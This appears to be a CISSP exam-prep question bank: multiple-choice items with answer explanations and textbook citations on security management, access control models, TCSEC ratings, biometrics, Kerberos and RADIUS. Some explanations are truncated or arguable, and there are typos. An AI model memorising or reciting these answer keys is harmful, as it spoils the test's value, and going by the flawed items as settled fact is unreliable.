In order to offer more independence and get more attention from management, an IT security function should be independent from IT and report directly to the CEO. Having it report to a specialized business unit (e.g. legal) is not recommended as it promotes a low technology view of the function and leads people to believe that it is someone else's problem.
Source: HARE, Chris, Security management Practices CISSP Open Study Guide, version 1.0, april 1999.
Which of the following would MOST likely ensure that a system development project meets business objectives?
Development and tests are run by different individuals
User involvement in system specification and acceptance
Development of a project plan identifying all development activities
Strict deadlines and budgets
Effective user involvement is the most critical factor in ensuring that the application meets business objectives.
A great way of getting early input from the user community is by using Prototyping. The prototyping method was formally introduced in the early 1980s to combat the perceived weaknesses of the waterfall model with regard to the speed of development. The objective is to build a simplified version (prototype) of the application, release it for review, and use the feedback from the users’ review to build a second, better version.
This is repeated until the users are satisfied with the product. t is a four-step process:
initial concept,
design and implement initial prototype,
refine prototype until acceptable, and
complete and release final version.
There is also the Modified Prototype Model (MPM. This is a form of prototyping that is ideal for Web application development. It allows for the basic functionality of a desired system or component to be formally deployed in a quick time frame. The maintenance phase is set to begin after the deployment. The goal is to have the process be flexible enough so the application is not based on the state of the organization at any given time. As the organization grows and the environment changes, the application evolves with it, rather than being frozen in time.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 12101-12108 and 12099-12101). Auerbach Publications. Kindle Edition.
and
Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 296).
Which of the following is often the greatest challenge of distributed computing solutions?
scalability
security
heterogeneity
usability
The correct answer to this "security". It is a major factor in deciding if a centralized or decentralized environment is more appropriate.
Example: In a centralized computing environment, you have a central server and workstations (often "dumb terminals") access applications, data, and everything else from that central servers. Therefore, the vast majority of your security resides on a centrally managed server. In a decentralized (or distributed) environment, you have a collection of PC's each with their own operating systems to maintain, their own software to maintain, local data storage requiring protection and backup. You may also have PDA's and "smart phones", data watches, USB devices of all types able to store data... the list gets longer all the time.
It is entirely possible to reach a reasonable and acceptable level of security in a distributed environment. But doing so is significantly more difficult, requiring more effort, more money, and more time.
The other answers are not correct because:
scalability - A distributed computing environment is almost infinitely scalable. Much more so than a centralized environment. This is therefore a bad answer.
heterogeneity - Having products and systems from multiple vendors in a distributed environment is significantly easier than in a centralized environment. This would not be a "challenge of distributed computing solutions" and so is not a good answer.
usability - This is potentially a challenge in either environment, but whether or not this is a problem has very little to do with whether it is a centralized or distributed environment. Therefore, this would not be a good answer.
Which of the following is not a component of a Operations Security "triples"?
Asset
Threat
Vulnerability
Risk
The Operations Security domain is concerned with triples - threats, vulnerabilities and assets.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 216.
Which of the following is NOT a basic component of security architecture?
Motherboard
Central Processing Unit (CPU
Storage Devices
Peripherals (input/output devices)
The CPU, storage devices and peripherals each have specialized roles in the security archecture. The CPU, or microprocessor, is the brains behind a computer system and performs calculations as it solves problemes and performs system tasks. Storage devices provide both long- and short-term stoarge of information that the CPU has either processed or may process. Peripherals (scanners, printers, modems, etc) are devices that either input datra or receive the data output by the CPU.
The motherboard is the main circuit board of a microcomputer and contains the connectors for attaching additional boards. Typically, the motherboard contains the CPU, BIOS, memory, mass storage interfaces, serial and parallel ports, expansion slots, and all the controllers required to control standard peripheral devices.
Reference(s) used for this question:
TIPTON, Harold F., The Official (ISC)2 Guide to the CISSP CBK (2007), page 308.
A trusted system does NOT involve which of the following?
Enforcement of a security policy.
Sufficiency and effectiveness of mechanisms to be able to enforce a security policy.
Assurance that the security policy can be enforced in an efficient and reliable manner.
Independently-verifiable evidence that the security policy-enforcing mechanisms are sufficient and effective.
A trusted system is one that meets its intended security requirements. It involves sufficiency and effectiveness, not necessarily efficiency, in enforcing a security policy. Put succinctly, trusted systems have (1) policy, (2) mechanism, and (3) assurance.
Source: HARE, Chris, Security Architecture and Models, Area 6 CISSP Open Study Guide, January 2002.
As per the Orange Book, what are two types of system assurance?
Operational Assurance and Architectural Assurance.
Design Assurance and Implementation Assurance.
Architectural Assurance and Implementation Assurance.
Operational Assurance and Life-Cycle Assurance.
Are the two types of assurance mentioned in the Orange book.
The following answers are incorrect:
Operational Assurance and Architectural Assurance. Is incorrect because Architectural Assurance is not a type of assurance mentioned in the Orange book.
Design Assurance and Implementation Assurance. Is incorrect because neither are types of assurance mentioned in the Orange book.
Architectural Assurance and Implementation Assurance. Is incorrect because neither are types of assurance mentioned in the Orange book.
Which must bear the primary responsibility for determining the level of protection needed for information systems resources?
IS security specialists
Senior Management
Senior security analysts
systems Auditors
If there is no support by senior management to implement, execute, and enforce security policies and procedure, then they won't work. Senior management must be involved in this because they have an obligation to the organization to protect the assests . The requirement here is for management to show “due diligence” in establishing an effective compliance, or security program. It is senior management that could face legal repercussions if they do not have sufficient controls in place.
The following answers are incorrect:
IS security specialists. Is incorrect because it is not the best answer. Senior management bears the primary responsibility for determining the level of protection needed.
Senior security analysts. Is incorrect because it is not the best answer. Senior management bears the primary responsibility for determining the level of protection needed.
systems auditors. Is incorrect because it is not the best answer, system auditors are responsible that the controls in place are effective. Senior management bears the primary responsibility for determining the level of protection needed.
An effective information security policy should not have which of the following characteristic?
Include separation of duties
Be designed with a short- to mid-term focus
Be understandable and supported by all stakeholders
Specify areas of responsibility and authority
An effective information security policy should be designed with a long-term focus. All other characteristics apply.
Source: ALLEN, Julia H., The CERT Guide to System and Network Security Practices, Addison-Wesley, 2001, Appendix B, Practice-Level Policy Considerations (page 397).
Who is responsible for implementing user clearances in computer-based information systems at the B3 level of the TCSEC rating ?
Security administrators
Operators
Data owners
Data custodians
Security administrator functions include user-oriented activities such as setting user clearances, setting initial password, setting other security characteristics for new users or changing security profiles for existing users. Data owners have the ultimate responsibility for protecting data, thus determining proper user access rights to data.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
The control of communications test equipment should be clearly addressed by security policy for which of the following reasons?
Test equipment is easily damaged.
Test equipment can be used to browse information passing on a network.
Test equipment is difficult to replace if lost or stolen.
Test equipment must always be available for the maintenance personnel.
Test equipment must be secured. There are equipment and other tools that if in the wrong hands could be used to "sniff" network traffic and also be used to commit fraud. The storage and use of this equipment should be detailed in the security policy for this reason.
The following answers are incorrect:
Test equipment is easily damaged. Is incorrect because it is not the best answer, and from a security point of view not relevent.
Test equipment is difficult to replace if lost or stolen. Is incorrect because it is not the best answer, and from a security point of view not relevent.
Test equipment must always be available for the maintenance personnel. Is incorrect because it is not the best answer, and from a security point of view not relevent.
References:
OIG CBK Operations Security (pages 642 - 643)
Which of the following is an advantage in using a bottom-up versus a top-down approach to software testing?
Interface errors are detected earlier.
Errors in critical modules are detected earlier.
Confidence in the system is achieved earlier.
Major functions and processing are tested earlier.
The bottom-up approach to software testing begins with the testing of atomic units, such as programs and modules, and work upwards until a complete system testing has taken place. The advantages of using a bottom-up approach to software testing are the fact that there is no need for stubs or drivers and errors in critical modules are found earlier. The other choices refer to advantages of a top down approach which follows the opposite path.
Source: Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 299).
Which of the following is used to interrupt the opportunity to use or perform collusion to subvert operation for fraudulent purposes?
Key escrow
Rotation of duties
Principle of need-to-know
Principle of least privilege
Job rotations reduce the risk of collusion of activities between individuals. Companies with individuals working with sensitive information or systems where there might be the opportunity for personal gain through collusion can benefit by integrating job rotation with segregation of duties. Rotating the position may uncover activities that the individual is performing outside of the normal operating procedures, highlighting errors or fraudulent behavior.
Rotation of duties is a method of reducing the risk associated with a subject performing a (sensitive) task by limiting the amount of time the subject is assigned to perform the task before being moved to a different task.
The following are incorrect answers:
Key escrow is related to the protection of keys in storage by splitting the key in pieces that will be controlled by different departments. Key escrow is the process of ensuring a third party maintains a copy of a private key or key needed to decrypt information. Key escrow also should be considered mandatory for most organization’s use of cryptography as encrypted information belongs to the organization and not the individual; however often an individual’s key is used to encrypt the information.
Separation of duties is a basic control that prevents or detects errors and irregularities by assigning responsibility for different parts of critical tasks to separate individuals, thus limiting the effect a single person can have on a system. One individual should not have the capability to execute all of the steps of a particular process. This is especially important in critical business areas, where individuals may have greater access and capability to modify, delete, or add data to the system. Failure to separate duties could result in individuals embezzling money from the company without the involvement of others.
The need-to-know principle specifies that a person must not only be cleared to access classified or other sensitive information, but have requirement for such information to carry out assigned job duties. Ordinary or limited user accounts are what most users are assigned. They should be restricted only to those privileges that are strictly required, following the principle of least privilege. Access should be limited to specific objects following the principle of need-to-know.
The principle of least privilege requires that each subject in a system be granted the most restrictive set of privileges (or lowest clearance) needed for the performance of authorized tasks. Least privilege refers to granting users only the accesses that are required to perform their job functions. Some employees will require greater access than others based upon their job functions. For example, an individual performing data entry on a mainframe system may have no need for Internet access or the ability to run reports regarding the information that they are entering into the system. Conversely, a supervisor may have the need to run reports, but should not be provided the capability to change information in the database.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 10628-10631). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 10635-10638). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 10693-10697). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 16338-16341). Auerbach Publications. Kindle Edition.
Configuration Management controls what?
Auditing of changes to the Trusted Computing Base.
Control of changes to the Trusted Computing Base.
Changes in the configuration access to the Trusted Computing Base.
Auditing and controlling any changes to the Trusted Computing Base.
All of these are components of Configuration Management.
The following answers are incorrect:
Auditing of changes to the Trusted Computing Base. Is incorrect because it refers only to auditing the changes, but nothing about controlling them.
Control of changes to the Trusted Computing Base. Is incorrect because it refers only to controlling the changes, but nothing about ensuring the changes will not lead to a weakness or fault in the system.
Changes in the configuration access to the Trusted Computing Base. Is incorrect because this does not refer to controlling the changes or ensuring the changes will not lead to a weakness or fault in the system.
Which of the following is based on the premise that the quality of a software product is a direct function of the quality of its associated software development and maintenance processes?
The Software Capability Maturity Model (CMM)
The Spiral Model
The Waterfall Model
Expert Systems Model
The Capability Maturity Model (CMM) is a service mark owned by Carnegie Mellon University (CMU) and refers to a development model elicited from actual data. The data was collected from organizations that contracted with the U.S. Department of Defense, who funded the research, and became the foundation from which CMU created the Software Engineering Institute (SEI). Like any model, it is an abstraction of an existing system.
The Capability Maturity Model (CMM) is a methodology used to develop and refine an organization's software development process. The model describes a five-level evolutionary path of increasingly organized and systematically more mature processes. CMM was developed and is promoted by the Software Engineering Institute (SEI), a research and development center sponsored by the U.S. Department of Defense (DoD). SEI was founded in 1984 to address software engineering issues and, in a broad sense, to advance software engineering methodologies. More specifically, SEI was established to optimize the process of developing, acquiring, and maintaining heavily software-reliant systems for the DoD. Because the processes involved are equally applicable to the software industry as a whole, SEI advocates industry-wide adoption of the CMM.
The CMM is similar to ISO 9001, one of the ISO 9000 series of standards specified by the International Organization for Standardization (ISO). The ISO 9000 standards specify an effective quality system for manufacturing and service industries; ISO 9001 deals specifically with software development and maintenance. The main difference between the two systems lies in their respective purposes: ISO 9001 specifies a minimal acceptable quality level for software processes, while the CMM establishes a framework for continuous process improvement and is more explicit than the ISO standard in defining the means to be employed to that end.
CMM's Five Maturity Levels of Software Processes
At the initial level, processes are disorganized, even chaotic. Success is likely to depend on individual efforts, and is not considered to be repeatable, because processes would not be sufficiently defined and documented to allow them to be replicated.
At the repeatable level, basic project management techniques are established, and successes could be repeated, because the requisite processes would have been made established, defined, and documented.
At the defined level, an organization has developed its own standard software process through greater attention to documentation, standardization, and integration.
At the managed level, an organization monitors and controls its own processes through data collection and analysis.
At the optimizing level, processes are constantly being improved through monitoring feedback from current processes and introducing innovative processes to better serve the organization's particular needs.
When it is applied to an existing organization's software development processes, it allows an effective approach toward improving them. Eventually it became clear that the model could be applied to other processes. This gave rise to a more general concept that is applied to business processes and to developing people.
CMM is superseded by CMMI
The CMM model proved useful to many organizations, but its application in software development has sometimes been problematic. Applying multiple models that are not integrated within and across an organization could be costly in terms of training, appraisals, and improvement activities. The Capability Maturity Model Integration (CMMI) project was formed to sort out the problem of using multiple CMMs.
For software development processes, the CMM has been superseded by Capability Maturity Model Integration (CMMI), though the CMM continues to be a general theoretical process capability model used in the public domain.
CMM is adapted to processes other than software development
The CMM was originally intended as a tool to evaluate the ability of government contractors to perform a contracted software project. Though it comes from the area of software development, it can be, has been, and continues to be widely applied as a general model of the maturity of processes (e.g., IT Service Management processes) in IS/IT (and other) organizations.
Source:
http://searchsoftwarequality.techtarget.com/sDefinition/0,,sid92_gci930057,00.html
and
http://en.wikipedia.org/wiki/Capability_Maturity_Model
How can an individual/person best be identified or authenticated to prevent local masquarading attacks?
UserId and password
Smart card and PIN code
Two-factor authentication
Biometrics
The only way to be truly positive in authenticating identity for access is to base the authentication on the physical attributes of the persons themselves (i.e., biometric identification). Physical attributes cannot be shared, borrowed, or duplicated. They ensure that you do identify the person, however they are not perfect and they would have to be supplemented by another factor.
Some people are getting thrown off by the term Masquarade. In general, a masquerade is a disguise. In terms of communications security issues, a masquerade is a type of attack where the attacker pretends to be an authorized user of a system in order to gain access to it or to gain greater privileges than they are authorized for. A masquerade may be attempted through the use of stolen logon IDs and passwords, through finding security gaps in programs, or through bypassing the authentication mechanism. Spoofing is another term used to describe this type of attack as well.
A UserId only provides for identification.
A password is a weak authentication mechanism since passwords can be disclosed, shared, written down, and more.
A smart card can be stolen and its corresponding PIN code can be guessed by an intruder. A smartcard can be borrowed by a friend of yours and you would have no clue as to who is really logging in using that smart card.
Any form of two-factor authentication not involving biometrics cannot be as reliable as a biometric system to identify the person.
Biometric identifying verification systems control people. If the person with the correct hand, eye, face, signature, or voice is not present, the identification and verification cannot take place and the desired action (i.e., portal passage, data, or resource access) does not occur.
As has been demonstrated many times, adversaries and criminals obtain and successfully use access cards, even those that require the addition of a PIN. This is because these systems control only pieces of plastic (and sometimes information), rather than people. Real asset and resource protection can only be accomplished by people, not cards and information, because unauthorized persons can (and do) obtain the cards and information.
Further, life-cycle costs are significantly reduced because no card or PIN administration system or personnel are required. The authorized person does not lose physical characteristics (i.e., hands, face, eyes, signature, or voice), but cards and PINs are continuously lost, stolen, or forgotten. This is why card access systems require systems and people to administer, control, record, and issue (new) cards and PINs. Moreover, the cards are an expensive and recurring cost.
NOTE FROM CLEMENT:
This question has been generating lots of interest. The keyword in the question is: Individual (the person) and also the authenticated portion as well.
I totally agree with you that Two Factors or Strong Authentication would be the strongest means of authentication. However the question is not asking what is the strongest mean of authentication, it is asking what is the best way to identify the user (individual) behind the technology. When answering questions do not make assumptions to facts not presented in the question or answers.
Nothing can beat Biometrics in such case. You cannot lend your fingerprint and pin to someone else, you cannot borrow one of my eye balls to defeat the Iris or Retina scan. This is why it is the best method to authenticate the user.
I think the reference is playing with semantics and that makes it a bit confusing. I have improved the question to make it a lot clearer and I have also improve the explanations attached with the question.
The reference mentioned above refers to authenticating the identity for access. So the distinction is being made that there is identity and there is authentication. In the case of physical security the enrollment process is where the identity of the user would be validated and then the biometrics features provided by the user would authenticate the user on a one to one matching basis (for authentication) with the reference contained in the database of biometrics templates. In the case of system access, the user might have to provide a username, a pin, a passphrase, a smart card, and then provide his biometric attributes.
Biometric can also be used for Identification purpose where you do a one to many match. You take a facial scan of someone within an airport and you attempt to match it with a large database of known criminal and terrorists. This is how you could use biometric for Identification.
There are always THREE means of authentication, they are:
Something you know (Type 1)
Something you have (Type 2)
Something you are (Type 3)
Reference(s) used for this question:
TIPTON, Harold F. & KRAUSE, Micki, Information Security Management Handbook, 4th edition (volume 1) , 2000, CRC Press, Chapter 1, Biometric Identification (page 7).
and
Search Security at http://searchsecurity.techtarget.com/definition/masquerade
Which of the following biometric parameters are better suited for authentication use over a long period of time?
Iris pattern
Voice pattern
Signature dynamics
Retina pattern
The iris pattern is considered lifelong. Unique features of the iris are: freckles, rings, rifts, pits, striations, fibers, filaments, furrows, vasculature and coronas. Voice, signature and retina patterns are more likely to change over time, thus are not as suitable for authentication over a long period of time without needing re-enrollment.
Source: FERREL, Robert G, Questions and Answers for the CISSP Exam, domain 1 (derived from the Information Security Management Handbook, 4th Ed., by Tipton & Krause).
Which of the following classes is defined in the TCSEC (Orange Book) as discretionary protection?
C
B
A
D
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, page 197.
Also: THE source for all TCSEC "level" questions: http://csrc.nist.gov/publications/secpubs/rainbow/std001.txt
Password management falls into which control category?
Compensating
Detective
Preventive
Technical
Password management is an example of preventive control.
Proper passwords prevent unauthorized users from accessing a system.
There are literally hundreds of different access approaches, control methods, and technologies, both in the physical world and in the virtual electronic world. Each method addresses a different type of access control or a specific access need.
For example, access control solutions may incorporate identification and authentication mechanisms, filters, rules, rights, logging and monitoring, policy, and a plethora of other controls. However, despite the diversity of access control methods, all access control systems can be categorized into seven primary categories.
The seven main categories of access control are:
1. Directive: Controls designed to specify acceptable rules of behavior within an organization
2. Deterrent: Controls designed to discourage people from violating security directives
3. Preventive: Controls implemented to prevent a security incident or information breach
4. Compensating: Controls implemented to substitute for the loss of primary controls and mitigate risk down to an acceptable level
5. Detective: Controls designed to signal a warning when a security control has been breached
6. Corrective: Controls implemented to remedy circumstance, mitigate damage, or restore controls
7. Recovery: Controls implemented to restore conditions to normal after a security incident
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 1156-1176). Auerbach Publications. Kindle Edition.
What is called the percentage of valid subjects that are falsely rejected by a Biometric Authentication system?
False Rejection Rate (FRR) or Type I Error
False Acceptance Rate (FAR) or Type II Error
Crossover Error Rate (CER)
True Rejection Rate (TRR) or Type III Error
The percentage of valid subjects that are falsely rejected is called the False Rejection Rate (FRR) or Type I Error.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 38.
Which of the following remote access authentication systems is the most robust?
TACACS+
RADIUS
PAP
TACACS
TACACS+ is a proprietary Cisco enhancement to TACACS and is more robust than RADIUS. PAP is not a remote access authentication system but a remote node security protocol.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 122).
Which of the following access control models requires security clearance for subjects?
Identity-based access control
Role-based access control
Discretionary access control
Mandatory access control
With mandatory access control (MAC), the authorization of a subject's access to an object is dependant upon labels, which indicate the subject's clearance. Identity-based access control is a type of discretionary access control. A role-based access control is a type of non-discretionary access control.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 2: Access control systems (page 33).
Which security model introduces access to objects only through programs?
The Biba model
The Bell-LaPadula model
The Clark-Wilson model
The information flow model
In the Clark-Wilson model, the subject no longer has direct access to objects but instead must access them through programs (well -formed transactions).
The Clark–Wilson integrity model provides a foundation for specifying and analyzing an integrity policy for a computing system.
The model is primarily concerned with formalizing the notion of information integrity. Information integrity is maintained by preventing corruption of data items in a system due to either error or malicious intent. An integrity policy describes how the data items in the system should be kept valid from one state of the system to the next and specifies the capabilities of various principals in the system. The model defines enforcement rules and certification rules.
Clark–Wilson is more clearly applicable to business and industry processes in which the integrity of the information content is paramount at any level of classification.
Integrity goals of Clark–Wilson model:
Prevent unauthorized users from making modification (Only this one is addressed by the Biba model).
Separation of duties prevents authorized users from making improper modifications.
Well formed transactions: maintain internal and external consistency i.e. it is a series of operations that are carried out to transfer the data from one consistent state to the other.
The following are incorrect answers:
The Biba model is incorrect. The Biba model is concerned with integrity and controls access to objects based on a comparison of the security level of the subject to that of the object.
The Bell-LaPdaula model is incorrect. The Bell-LaPaula model is concerned with confidentiality and controls access to objects based on a comparison of the clearence level of the subject to the classification level of the object.
The information flow model is incorrect. The information flow model uses a lattice where objects are labelled with security classes and information can flow either upward or at the same level. It is similar in framework to the Bell-LaPadula model.
References:
ISC2 Official Study Guide, Pages 325 - 327
AIO3, pp. 284 - 287
AIOv4 Security Architecture and Design (pages 338 - 342)
AIOv5 Security Architecture and Design (pages 341 - 344)
Wikipedia at: https://en.wikipedia.org/wiki/Clark-Wilson_model
Which of the following is most relevant to determining the maximum effective cost of access control?
the value of information that is protected
management's perceptions regarding data importance
budget planning related to base versus incremental spending.
the cost to replace lost data
The cost of access control must be commensurate with the value of the information that is being protected.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 49.
Which of the following statements pertaining to using Kerberos without any extension is false?
A client can be impersonated by password-guessing.
Kerberos is mostly a third-party authentication protocol.
Kerberos uses public key cryptography.
Kerberos provides robust authentication.
Kerberos is a trusted, credential-based, third-party authentication protocol that uses symmetric (secret) key cryptography to provide robust authentication to clients accessing services on a network.
Because a client's password is used in the initiation of the Kerberos request for the service protocol, password guessing can be used to impersonate a client.
Here is a nice overview of HOW Kerberos is implement as described in RFC 4556:
1. Introduction
The Kerberos V5 protocol [RFC4120] involves use of a trusted third
party known as the Key Distribution Center (KDC) to negotiate shared
session keys between clients and services and provide mutual
authentication between them.
The corner-stones of Kerberos V5 are the Ticket and the
Authenticator. A Ticket encapsulates a symmetric key (the ticket
session key) in an envelope (a public message) intended for a
specific service. The contents of the Ticket are encrypted with a
symmetric key shared between the service principal and the issuing
KDC. The encrypted part of the Ticket contains the client principal
name, among other items. An Authenticator is a record that can be
shown to have been recently generated using the ticket session key in
the associated Ticket. The ticket session key is known by the client
who requested the ticket. The contents of the Authenticator are
encrypted with the associated ticket session key. The encrypted part
of an Authenticator contains a timestamp and the client principal
name, among other items.
As shown in Figure 1, below, the Kerberos V5 protocol consists of the
following message exchanges between the client and the KDC, and the
client and the application service:
The Authentication Service (AS) Exchange
The client obtains an "initial" ticket from the Kerberos
authentication server (AS), typically a Ticket Granting Ticket
(TGT). The AS-REQ message and the AS-REP message are the request
and the reply message, respectively, between the client and the
AS.
The Ticket Granting Service (TGS) Exchange
The client subsequently uses the TGT to authenticate and request a
service ticket for a particular service, from the Kerberos
ticket-granting server (TGS). The TGS-REQ message and the TGS-REP
message are the request and the reply message respectively between
the client and the TGS.
The Client/Server Authentication Protocol (AP) Exchange
The client then makes a request with an AP-REQ message, consisting
of a service ticket and an authenticator that certifies the
client's possession of the ticket session key. The server may
optionally reply with an AP-REP message. AP exchanges typically
negotiate session-specific symmetric keys.
Usually, the AS and TGS are integrated in a single device also known
as the KDC.
+--------------+
+--------->| KDC |
AS-REQ / +-------| |
/ / +--------------+
/ / ^ |
/ |AS-REP / |
| | / TGS-REQ + TGS-REP
| | / /
| | / /
| | / +---------+
| | / /
| | / /
| | / /
| v / v
++-------+------+ +-----------------+
| Client +------------>| Application |
| | AP-REQ | Server |
| |<------------| |
+---------------+ AP-REP +-----------------+
Figure 1: The Message Exchanges in the Kerberos V5 Protocol
In the AS exchange, the KDC reply contains the ticket session key,
among other items, that is encrypted using a key (the AS reply key)
shared between the client and the KDC. The AS reply key is typically
derived from the client's password for human users. Therefore, for
human users, the attack resistance strength of the Kerberos protocol
is no stronger than the strength of their passwords.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 2: Access control systems (page 40).
And
HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 4: Access Control (pages 147-151).
and
http://www.ietf.org/rfc/rfc4556.txt
What is Kerberos?
A three-headed dog from the egyptian mythology.
A trusted third-party authentication protocol.
A security model.
A remote authentication dial in user server.
Is correct because that is exactly what Kerberos is.
The following answers are incorrect:
A three-headed dog from Egyptian mythology. Is incorrect because we are dealing with Information Security and not the Egyptian mythology but the Greek Mythology.
A security model. Is incorrect because Kerberos is an authentication protocol and not just a security model.
A remote authentication dial in user server. Is incorrect because Kerberos is not a remote authentication dial in user server that would be called RADIUS.
What refers to legitimate users accessing networked services that would normally be restricted to them?
Spoofing
Piggybacking
Eavesdropping
Logon abuse
Unauthorized access of restricted network services by the circumvention of security access controls is known as logon abuse. This type of abuse refers to users who may be internal to the network but access resources they would not normally be allowed.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 74).
Which of the following is most affected by denial-of-service (DOS) attacks?
Confidentiality
Integrity
Accountability
Availability
Denial of service attacks obviously affect availability of targeted systems.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 61).
The type of discretionary access control (DAC) that is based on an individual's identity is also called:
Identity-based Access control
Rule-based Access control
Non-Discretionary Access Control
Lattice-based Access control
An identity-based access control is a type of Discretionary Access Control (DAC) that is based on an individual's identity.
DAC is good for low level security environment. The owner of the file decides who has access to the file.
If a user creates a file, he is the owner of that file. An identifier for this user is placed in the file header and/or in an access control matrix within the operating system.
Ownership might also be granted to a specific individual. For example, a manager for a certain department might be made the owner of the files and resources within her department. A system that uses discretionary access control (DAC) enables the owner of the resource to specify which subjects can access specific resources.
This model is called discretionary because the control of access is based on the discretion of the owner. Many times department managers, or business unit managers , are the owners of the data within their specific department. Being the owner, they can specify who should have access and who should not.
Reference(s) used for this question:
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (p. 220). McGraw-Hill . Kindle Edition.
RADIUS incorporates which of the following services?
Authentication server and PIN codes.
Authentication of clients and static passwords generation.
Authentication of clients and dynamic passwords generation.
Authentication server as well as support for Static and Dynamic passwords.
A Network Access Server (NAS) operates as a client of RADIUS. The client is responsible for passing user information to
designated RADIUS servers, and then acting on the response which is returned.
RADIUS servers are responsible for receiving user connection requests, authenticating the user, and then returning all
configuration information necessary for the client to deliver service to the user.
RADIUS authentication is based on provisions of simple username/password credentials. These credentials are encrypted
by the client using a shared secret between the client and the RADIUS server. OIG 2007, Page 513
RADIUS incorporates an authentication server and can make uses of both dynamic and static passwords.
Since it uses the PAP and CHAP protocols, it also incluses static passwords.
RADIUS is an Internet protocol. RADIUS carries authentication, authorization, and configuration information between a Network Access Server and a shared Authentication Server. RADIUS features and functions are described primarily in the IETF (International Engineering Task Force) document RFC2138.
The term " RADIUS" is an acronym which stands for Remote Authentication Dial In User Service.
The main advantage to using a RADIUS approach to authentication is that it can provide a stronger form of authentication. RADIUS is capable of using a strong, two-factor form of authentication, in which users need to possess both a user ID and a hardware or software token to gain access.
Token-based schemes use dynamic passwords. Every minute or so, the token generates a unique 4-, 6- or 8-digit access number that is synchronized with the security server. To gain entry into the system, the user must generate both this one-time number and provide his or her user ID and password.
Although protocols such as RADIUS cannot protect against theft of an authenticated session via some realtime attacks, such as wiretapping, using unique, unpredictable authentication requests can protect against a wide range of active attacks.
RADIUS: Key Features and Benefits
Features Benefits
RADIUS supports dynamic passwords and challenge/response passwords.
Improved system security due to the fact that passwords are not static.
It is much more difficult for a bogus host to spoof users into giving up their passwords or password-generation algorithms.
RADIUS allows the user to have a single user ID and password for all computers in a network.
Improved usability due to the fact that the user has to remember only one login combination.
RADIUS is able to:
Prevent RADIUS users from logging in via login (or ftp).
Require them to log in via login (or ftp)
Require them to login to a specific network access server (NAS);
Control access by time of day.
Provides very granular control over the types of logins allowed, on a per-user basis.
The time-out interval for failing over from an unresponsive primary RADIUS server to a backup RADIUS server is site-configurable.
RADIUS gives System Administrator more flexibility in managing which users can login from which hosts or devices.
Stratus Technology Product Brief
http://www.stratus.com/products/vos/openvos/radius.htm
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Pages 43, 44.
Also check: MILLER, Lawrence & GREGORY, Peter, CISSP for Dummies, 2002, Wiley Publishing, Inc., pages 45-46.
How are memory cards and smart cards different?
Memory cards normally hold more memory than smart cards
Smart cards provide a two-factor authentication whereas memory cards don't
Memory cards have no processing power
Only smart cards can be used for ATM cards
The main difference between memory cards and smart cards is their capacity to process information. A memory card holds information but cannot process information. A smart card holds information and has the necessary hardware and software to actually process that information.
A memory card holds a user’s authentication information, so that this user needs only type in a user ID or PIN and presents the memory card to the system. If the entered information and the stored information match and are approved by an authentication service, the user is successfully authenticated.
A common example of a memory card is a swipe card used to provide entry to a building. The user enters a PIN and swipes the memory card through a card reader. If this is the correct combination, the reader flashes green and the individual can open the door and enter the building.
Memory cards can also be used with computers, but they require a reader to process the information. The reader adds cost to the process, especially when one is needed for every computer. Additionally, the overhead of PIN and card generation adds additional overhead and complexity to the whole authentication process. However, a memory card provides a more secure authentication method than using only a password because the attacker would need to obtain the card and know the correct PIN.
Administrators and management need to weigh the costs and benefits of a memory card implementation as well as the security needs of the organization to determine if it is the right authentication mechanism for their environment.
One of the most prevalent weaknesses of memory cards is that data stored on the card are not protected. Unencrypted data on the card (or stored on the magnetic strip) can be extracted or copied. Unlike a smart card, where security controls and logic are embedded in the integrated circuit, memory cards do not employ an inherent mechanism to protect the data from exposure.
